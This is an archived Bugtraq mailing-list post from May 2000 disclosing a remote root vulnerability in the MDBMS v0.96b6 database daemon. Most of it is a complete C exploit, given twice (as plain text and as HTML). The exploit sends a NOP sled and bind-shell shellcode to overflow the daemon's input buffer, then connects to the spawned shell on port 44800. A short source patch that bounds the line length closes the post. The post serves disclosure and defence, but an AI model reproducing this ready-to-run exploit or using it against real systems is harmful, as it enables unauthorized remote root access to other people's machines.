[15018] in bugtraq
Remote xploit for MDBMS
daemon@ATHENA.MIT.EDU (|[TDP]|)
Wed May 24 14:35:57 2000
Mime-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_0095_01BFC568.DA6B50C0"
Message-Id: <009a01bfc558$1a38fec0$01dc11ac@ofi.interno.peoplecall.com>
Date: Wed, 24 May 2000 10:14:32 +0200
Reply-To: "|[TDP]|" <tdp@psynet.net>
From: "|[TDP]|" <tdp@PSYNET.NET>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
------=_NextPart_000_0095_01BFC568.DA6B50C0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
/* MDBMS V0.96b6 remote shell xploit=20
* 11/05/2000 |[TDP]| <tdp@psynet.net> - HaCk-13 TeaM
*
* This code shows a MDBMS v0.96b6 vulnerability in which, any remote
* user can exec a shell. MDBMS daemon used to be ran as root user; =
exposing
* the system to serious vulnerability risks, because any attacker can =
obtain
* root priviledges remotely with this exploit
*
* Exploit tested on LiNUX SuSE 6.3... previous MDBMS versions may
* be affected by this vulnerability. Fix at end of this doc.
*
* Greetings goes to all other members and all my friends
*
*/
=20
=20
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netdb.h>
#include <netinet/in.h>
#define NOP 0x90
#define LEN 10008
#define RET 0xbffff586
/* Special shell code */
char shellcode[] =3D
=
"\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0\x31\xdb\x89=
\xf1"
=
"\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06\x89\x46\x08\xb0\x66\xb3\x01=
\xcd"
=
"\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\xaf\x66\x89\x46\x0e\x8d\x46\x0c=
\x89"
=
"\x46\x04\x31\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80=
\xeb"
=
"\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04\xcd\x80\x31\xc0=
\x89"
=
"\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd\x80\x88\xc3\xb0\x3f\x31\xc9\xcd=
\x80"
=
"\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89=
\x06"
=
"\xb8\x2f\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46=
\x0c"
=
"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xc0\xb0\x01\x31\xdb=
\xcd"
"\x80\xe8\x5b\xff\xff\xff";
long
resolveip (char *name)
{
struct hostent *hp;
long ip;
if ((ip =3D inet_addr (name)) =3D=3D -1)
{
if ((hp =3D gethostbyname (name)) =3D=3D NULL)
{
fprintf (stderr, "Can't resolve host name [%s].\n", name);
exit (0);
}
memcpy (&ip, (hp->h_addr), 4);
}
return (ip);
}
int
main (int argc, char *argv[])
{
char buffer[LEN], buffer2[LEN + 10];
long retaddr =3D RET;
long remoteip;
unsigned long sp;
int i, a, shellsock, clisock;
struct sockaddr_in clisin, shsin;
char snd[4096], rcv[4096];
fd_set rset;
fprintf (stderr,
"\nMDBMS v0.96b6 Remote Shell Xploit - <tdp@psynet.net>\n");
if (argc < 2)
{
fprintf (stderr, "Usage: %s ip [offset]\n", argv[0]);
exit (-1);
}
if (argc > 2)
a =3D atoi (argv[2]);
else
a =3D 0;
retaddr =3D retaddr + a;
for (i =3D 0; i < LEN; i +=3D 4)
*(long *) &buffer[i] =3D retaddr;
for (i =3D 0; i < (LEN - strlen (shellcode) - 100); i++)
*(buffer + i) =3D NOP;
memcpy (buffer + i, shellcode, strlen (shellcode));
sprintf (buffer2, "%s\n", buffer);
fprintf (stderr, "Connecting to remote MDBMS server...\n");
fflush (stdout);
remoteip =3D resolveip (argv[1]);
clisock =3D socket (PF_INET, SOCK_STREAM, IPPROTO_TCP);
if (clisock =3D=3D -1)
{
fprintf (stderr, "Can't create main socket");
exit (-1);
}
clisin.sin_family =3D AF_INET;
clisin.sin_port =3D htons (2224);
clisin.sin_addr.s_addr =3D remoteip;
if (connect (clisock, (struct sockaddr *) &clisin, sizeof (clisin)) =
=3D=3D -1)
{
fprintf (stderr, "Can't connect to the MDBMS fastport, trying =
normal port...\n");
clisin.sin_family =3D AF_INET;
clisin.sin_port =3D htons (2223);
clisin.sin_addr.s_addr =3D remoteip;
if (connect (clisock, (struct sockaddr *) &clisin, sizeof =
(clisin)) =3D=3D
-1)
{
fprintf
(stderr, "Can't connect to normalport... MDBMS is running in remote =
server?\n\n");
exit (0);
}
exit (0);
}
switch (i =3D read (clisock, buffer, LEN))
{
case -1:
{
fprintf (stderr, "ClientSocket: unexpected EOF\n");
exit (0);
}
case 0:
{
fprintf (stderr, "ClientSocket: EOF\n");
exit (0);
}
default:
buffer[i] =3D 0;
fprintf (stderr, "%s\n", buffer);
break;
}
fprintf (stderr, "Sending xploit, jumping to address 0x%lx\n", =
retaddr);
i =3D write (clisock, buffer2, strlen (buffer2));
fsync (clisock);
if ((i < 10000) || (i > 10018))
{
fprintf (stderr, "ClientSocket: Error writing xploit\n");
exit (0);
}
close (clisock);
fprintf (stderr, "Waiting 2 secs for hell...\n");
sleep (2);
/* shell stuFF */
fprintf (stderr, "Connecting to the shell...\n");
fflush (stdout);
memset (&shsin, 0, sizeof (shsin));
shsin.sin_family =3D AF_INET;
shsin.sin_port =3D htons (44800);
shsin.sin_addr.s_addr =3D remoteip;
if ((shellsock =3D socket (PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
{
fprintf (stderr, "Can't create shell socket\n");
exit (-1);
}
if (connect (shellsock, (struct sockaddr *) &shsin, sizeof (shsin)) < =
0)
{
fprintf (stderr, "Can't connect to the shell\n\n");
exit (0);
}
fprintf (stderr, "Connected\n");
while (1)
{
FD_ZERO (&rset);
FD_SET (fileno (stdin), &rset);
FD_SET (shellsock, &rset);
select (255, &rset, NULL, NULL, NULL);
if (FD_ISSET (fileno (stdin), &rset))
{
memset (snd, 0, sizeof (snd));
fgets (snd, sizeof (snd), stdin);
write (shellsock, snd, strlen (snd));
}
if (FD_ISSET (shellsock, &rset))
{
memset (rcv, 0, sizeof (rcv));
if (read (shellsock, rcv, sizeof (rcv)) <=3D 0)
exit (0);
fputs (rcv, stdout);
}
}
return (0);
}
/* FIX --- mdbmsfix.diff -------- cut here -----------
*** mdbms-0.99/include/interface.hh Sun Sep 21 13:48:21 1997
--- mdbms-0.99-fixed/include/interface.hh Wed May 12 01:00:55 2000
*************** class user
*** 71,73 ****
void unload();
! int nextline(char *, char *);
void uprintf(char *, ...);
--- 71,73 ----
void unload();
! int nextline(char *, char *, int);
void uprintf(char *, ...);
*** mdbms-0.99/mdbms/interface.cc Sat Nov 8 12:12:31 1997
--- mdbms-0.99-fixed/mdbms/interface.cc Wed May 12 01:00:10 2000
*************** void user::input()
*** 223,225 ****
}
! int user::nextline(char *source, char *dest)
{
--- 223,225 ----
}
! int user::nextline(char *source, char *dest, int limit)
{
*************** int user::nextline(char *source, char *d
*** 227,228 ****
--- 227,231 ----
if (!where) return -1;
+ // Sec Fix - |[TDP]| <tdp@psynet.net> //
+ if ((where-source)>limit)
+ return(-1);
*(where++)=3D'\0';
*************** void user::run()
*** 263,265 ****
if (blocked) return;
! while (nextline(inbuf,buf)!=3D-1)
{
--- 266,268 ----
if (blocked) return;
! while (nextline(inbuf,buf,sizeof(buf))!=3D-1)
{
--------------------- cuthere -----------------------*/
------=_NextPart_000_0095_01BFC568.DA6B50C0
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Diso-8859-1" =
http-equiv=3DContent-Type>
<META content=3D"MSHTML 5.00.2722.2800" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial=20
size=3D2>/* &n=
bsp; =20
MDBMS V0.96b6 remote shell xploit=20
<BR> * =20
11/05/2000 |[TDP]| <<A=20
href=3D"mailto:tdp@psynet.net">tdp@psynet.net</A>> - =
HaCk-13=20
TeaM<BR> *<BR> * This code shows a MDBMS v0.96b6 =
vulnerability=20
in which, any remote<BR> * user can exec a shell. MDBMS daemon used =
to be=20
ran as root user; exposing<BR> * the system to serious =
vulnerability risks,=20
because any attacker can obtain<BR> * root priviledges remotely =
with this=20
exploit<BR> *<BR> * Exploit tested on LiNUX SuSE 6.3... =
previous=20
MDBMS versions may<BR> * be affected by this vulnerability. =
Fix at=20
end of this doc.<BR> *<BR> * =
Greetings=20
goes to all other members and all my=20
friends<BR> *<BR> */<BR> <BR> </FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>#include <stdio.h><BR>#include=20
<unistd.h><BR>#include <stdlib.h><BR>#include=20
<netdb.h><BR>#include <netinet/in.h></FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>#define NOP =
0x90<BR>#define=20
LEN 10008<BR>#define RET =
0xbffff586</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>/* Special shell code */<BR>char =
shellcode[]=20
=3D<BR> =20
"\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0\x31\xdb\x89=
\xf1"<BR> =20
"\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06\x89\x46\x08\xb0\x66\xb3\x01=
\xcd"<BR> =20
"\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\xaf\x66\x89\x46\x0e\x8d\x46\x0c=
\x89"<BR> =20
"\x46\x04\x31\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80=
\xeb"<BR> =20
"\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04\xcd\x80\x31\xc0=
\x89"<BR> =20
"\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd\x80\x88\xc3\xb0\x3f\x31\xc9\xcd=
\x80"<BR> =20
"\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89=
\x06"<BR> =20
"\xb8\x2f\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46=
\x0c"<BR> =20
"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xc0\xb0\x01\x31\xdb=
\xcd"<BR> =20
"\x80\xe8\x5b\xff\xff\xff";</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>long<BR>resolveip (char =
*name)<BR>{<BR> =20
struct hostent *hp;<BR> long ip;</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> if ((ip =3D inet_addr (name)) =
=3D=3D=20
-1)<BR> {<BR> if ((hp =
=3D=20
gethostbyname (name)) =3D=3D NULL)<BR> {<BR> fprintf =
(stderr,=20
"Can't resolve host name [%s].\n", name);<BR> exit=20
(0);<BR> }<BR> memcpy (&ip,=20
(hp->h_addr), 4);<BR> }<BR> return=20
(ip);<BR>}</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>int<BR>main (int argc, char =
*argv[])<BR>{<BR> =20
char buffer[LEN], buffer2[LEN + 10];<BR> long retaddr =3D =
RET;<BR> =20
long remoteip;<BR> unsigned long sp;<BR> int i, a, =
shellsock,=20
clisock;<BR> struct sockaddr_in clisin, shsin;<BR> char =
snd[4096],=20
rcv[4096];<BR> fd_set rset;</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> fprintf =
(stderr,<BR> =20
"\nMDBMS v0.96b6 Remote Shell Xploit - <<A=20
href=3D"mailto:tdp@psynet.net">tdp@psynet.net</A>>\n");</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> if (argc < =
2)<BR> =20
{<BR> fprintf (stderr, "Usage: %s ip =
[offset]\n",=20
argv[0]);<BR> exit =
(-1);<BR> =20
}</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> if (argc > =
2)<BR> a =3D=20
atoi (argv[2]);<BR> else<BR> a =3D =
0;</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> retaddr =3D retaddr + =
a;</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> for (i =3D 0; i < LEN; i +=3D =
4)<BR> *(long *) &buffer[i] =3D =
retaddr;</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> for (i =3D 0; i < (LEN - =
strlen (shellcode)=20
- 100); i++)<BR> *(buffer + i) =3D NOP;</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> memcpy (buffer + i, shellcode, =
strlen=20
(shellcode));<BR> sprintf (buffer2, "%s\n", buffer);</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> fprintf (stderr, "Connecting to =
remote MDBMS=20
server...\n");<BR> fflush (stdout);<BR> remoteip =3D =
resolveip=20
(argv[1]);<BR> clisock =3D socket (PF_INET, SOCK_STREAM,=20
IPPROTO_TCP);<BR> if (clisock =3D=3D -1)<BR> =20
{<BR> fprintf (stderr, "Can't create main=20
socket");<BR> exit =
(-1);<BR> =20
}<BR> clisin.sin_family =3D AF_INET;<BR> clisin.sin_port =3D =
htons=20
(2224);<BR> clisin.sin_addr.s_addr =3D remoteip;<BR> if =
(connect=20
(clisock, (struct sockaddr *) &clisin, sizeof (clisin)) =3D=3D=20
-1)<BR> {<BR> fprintf =
(stderr,=20
"Can't connect to the MDBMS fastport, trying normal=20
port...\n");<BR> clisin.sin_family =3D=20
AF_INET;<BR> clisin.sin_port =3D htons=20
(2223);<BR> clisin.sin_addr.s_addr =3D=20
remoteip;<BR> if (connect (clisock, =
(struct=20
sockaddr *) &clisin, sizeof (clisin)) =3D=3D<BR> =20
-1)<BR> {<BR> fprintf<BR> =
(stderr,=20
"Can't connect to normalport... MDBMS is running in remote=20
server?\n\n");<BR> exit=20
(0);<BR> }<BR> exit=20
(0);<BR> }</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> switch (i =3D read (clisock, =
buffer,=20
LEN))<BR> {<BR> case=20
-1:<BR> {<BR> fprintf (stderr, =
"ClientSocket:=20
unexpected EOF\n");<BR> exit (0);<BR> =
}<BR> case 0:<BR> =20
{<BR> fprintf (stderr, "ClientSocket: EOF\n");<BR> exit=20
(0);<BR> }<BR> =20
default:<BR> buffer[i] =3D=20
0;<BR> fprintf (stderr, "%s\n",=20
buffer);<BR> break;<BR> =20
}<BR> fprintf (stderr, "Sending xploit, jumping to address =
0x%lx\n",=20
retaddr);<BR> i =3D write (clisock, buffer2, strlen =
(buffer2));<BR> =20
fsync (clisock);<BR> if ((i < 10000) || (i >=20
10018))<BR> {<BR> =
fprintf=20
(stderr, "ClientSocket: Error writing=20
xploit\n");<BR> exit =
(0);<BR> =20
}<BR> close (clisock);</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> fprintf (stderr, "Waiting 2 secs =
for=20
hell...\n");<BR> sleep (2);<BR>/* shell stuFF */<BR> fprintf =
(stderr, "Connecting to the shell...\n");<BR> fflush=20
(stdout);</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> memset (&shsin, 0, sizeof=20
(shsin));<BR> shsin.sin_family =3D AF_INET;<BR> =
shsin.sin_port =3D htons=20
(44800);<BR> shsin.sin_addr.s_addr =3D remoteip;</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> if ((shellsock =3D socket =
(PF_INET,=20
SOCK_STREAM, IPPROTO_TCP)) < 0)<BR> =20
{<BR> fprintf (stderr, "Can't create shell =
socket\n");<BR> exit =
(-1);<BR> =20
}</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> if (connect (shellsock, (struct =
sockaddr *)=20
&shsin, sizeof (shsin)) < 0)<BR> =20
{<BR> fprintf (stderr, "Can't connect to =
the=20
shell\n\n");<BR> exit =
(0);<BR> =20
}</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> fprintf (stderr,=20
"Connected\n");</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> while (1)<BR> =20
{<BR> FD_ZERO=20
(&rset);<BR> FD_SET (fileno (stdin),=20
&rset);<BR> FD_SET (shellsock,=20
&rset);<BR> select (255, &rset, =
NULL,=20
NULL, NULL);<BR> if (FD_ISSET (fileno =
(stdin),=20
&rset))<BR> {<BR> memset (snd, 0, sizeof=20
(snd));<BR> fgets (snd, sizeof (snd), =
stdin);<BR> write=20
(shellsock, snd, strlen =
(snd));<BR> }<BR> if=20
(FD_ISSET (shellsock, &rset))<BR> {<BR> memset =
(rcv, 0,=20
sizeof (rcv));<BR> if (read (shellsock, rcv, sizeof (rcv)) =
<=3D=20
0)<BR> exit (0);<BR> fputs (rcv,=20
stdout);<BR> }<BR> }</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> return (0);<BR>}</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2><BR>/* FIX --- mdbmsfix.diff =
-------- cut=20
here -----------</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>*** =
mdbms-0.99/include/interface.hh Sun Sep 21=20
13:48:21 1997<BR>--- mdbms-0.99-fixed/include/interface.hh Wed May =
12=20
01:00:55 2000<BR>*************** class user<BR>*** 71,73=20
****<BR> void unload();<BR>! =
int=20
nextline(char *, char *);<BR> void uprintf(char =
*,=20
...);<BR>--- 71,73 ----<BR> void=20
unload();<BR>! int nextline(char *, char *,=20
int);<BR> void uprintf(char *, ...);<BR>***=20
mdbms-0.99/mdbms/interface.cc Sat Nov 8 12:12:31 1997<BR>---=20
mdbms-0.99-fixed/mdbms/interface.cc Wed May 12 01:00:10=20
2000<BR>*************** void user::input()<BR>*** 223,225 ****<BR> =
}<BR>!=20
int user::nextline(char *source, char *dest)<BR> {<BR>--- 223,225=20
----<BR> }<BR>! int user::nextline(char *source, char *dest, int=20
limit)<BR> {<BR>*************** int user::nextline(char *source, =
char=20
*d<BR>*** 227,228 ****<BR>--- 227,231 ----<BR> =
if=20
(!where) return -1;<BR>+ // Sec Fix - |[TDP]| <<A=20
href=3D"mailto:tdp@psynet.net">tdp@psynet.net</A>> =
//<BR>+ if=20
((where-source)>limit)<BR>+ =20
return(-1);<BR> =
*(where++)=3D'\0';<BR>*************** void=20
user::run()<BR>*** 263,265 ****<BR> if (blocked) =
return;<BR>! while=20
(nextline(inbuf,buf)!=3D-1)<BR> {<BR>--- 266,268 =
----<BR> if (blocked) =
return;<BR>! =20
while =
(nextline(inbuf,buf,sizeof(buf))!=3D-1)<BR> =20
{</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>--------------------- cuthere=20
-----------------------*/<BR></FONT></DIV></BODY></HTML>
------=_NextPart_000_0095_01BFC568.DA6B50C0--
